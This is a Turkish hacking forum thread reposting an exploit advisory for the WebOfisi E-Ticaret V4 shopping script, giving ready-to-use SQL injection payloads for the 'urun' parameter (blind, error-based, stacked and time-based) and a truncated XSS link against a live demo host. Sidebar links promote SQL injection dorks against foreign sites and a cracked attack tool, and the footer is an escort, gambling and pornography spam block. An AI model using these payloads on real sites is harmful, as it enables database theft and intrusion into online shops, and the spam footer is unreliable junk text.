Konu Bilgileri
Konu: WebOfisi E-Ticaret V4 - 'urun' SQL Injection Yazar: B0RU70
Okunma: 314 Yorum: 1
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
Exploit Title: WebOfisi E-Ticaret V4 - 'urun' SQL Injection
# Date: 2018-11-21
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.web-ofisi.com
# Software Demo: http://demobul.net/eticaretv4/
# Software Link: https://drive.google.com/file/d/1ZghFSsY...sp=sharing
# Version: v4.0
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: E-Ticaret v4 is a professional online shopping script with many features.
# Vulnerabilities have been discovered during penetration testing.

# PoC : SQLi :
# Request : /eticaretv4/arama.html?kategori=20&urun=test

# Parameter : urun (GET)
# Type : boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: 

kategori=20&urun=test") RLIKE (SELECT (CASE WHEN (6525=6525)THEN 0x74656474 ELSE 0x28 END)) AND ("YWLa"="YWLa

# Type: error-based
# Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: 

kategori=20&urun=test") OR (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT(ELT(6556=6556,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("ExaV"="ExaV

# Type: stacked queries
# Title: MySQL < 5.0.12 stacked queries (heavy query)
# Payload: 

kategori=20&urun=test");SELECT BENCHMARK(5000000,MD5(0x44527964)) AND ("KGaO"="KGaO

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: 

kategori=20&urun=test") OR SLEEP(5) AND ("sDnb"="sDnb

# PoC : XSS :
# Payload :
http://demobul.net/eticaretv4/arama.html...%280%29%3E


---------------------------------------

Hide Post

Foruma Üye , hesabınız yoksa kayıt olmanız gerekmektedir

Cevapla
#2
teşekkürler elime vardı.

emeğine sağlık
Ara
Cevapla


WebOfisi E-Ticaret V4 - 'urun' SQL Injection Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Yunanistan SQL injection için google dorkları HeRoTurk 40 8,026 13.10.2020, Saat:17:12
Son Yorum: vatansever34
  NASA earthobservatory Blind SQL Injection TurKLoJeN 18 2,671 30.06.2020, Saat:12:56
Son Yorum: byrkoos
  Virüssüz Havij 1.15 Pro - Advanced SQL Injection Final Kzsg 77 18,555 26.06.2020, Saat:12:30
Son Yorum: skyquadra
  2020 SQL İNJECTİON DORKS +4000 DRACULA 0 208 13.05.2020, Saat:16:17
Son Yorum: DRACULA
  SQL Injection Master Course - UDEMY($300) adige1431 3 1,035 03.05.2020, Saat:22:16
Son Yorum: ylv2568


mersin escort izmir escort izmir escort gaziantep escort canlı bahis siteleri tipobet bahis siteleri kaçak iddaa canlı bahis mobilbahis deneme bonusu deneme bonusu bodrum escort kuşadası escort türkçe altyazılı porno hack forum porno escort izmit kızılay escort antalya escort maltepe escort antalya escort alanya escort tipobet canlı sohbet hattı